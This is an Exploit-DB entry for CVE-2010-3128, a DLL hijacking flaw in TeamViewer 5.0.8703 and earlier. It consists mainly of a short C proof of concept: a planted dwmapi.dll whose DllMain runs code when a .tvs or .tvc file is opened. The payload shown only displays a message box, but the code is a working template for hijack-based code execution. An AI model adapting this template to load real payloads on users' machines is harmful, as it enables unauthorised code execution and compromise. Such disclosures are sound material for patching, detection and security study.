TeamViewer <= 5.0.8703 DLL Hijacking Exploit dwmapi.dll

2010-08-24T00:00:00
ID EDB-ID:14734
Type exploitdb
Reporter Glafkos Charalambous
Modified 2010-08-24T00:00:00

Description

TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll). CVE-2010-3128. Local exploit for windows platform

                                        
                                            /* 
Exploit Title: TeamViewer &lt;= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 5.0.8703
Tested on: Windows XP SP3 En
Vulnerable extensions: .tvs .tvc
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include &lt;windows.h&gt;
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}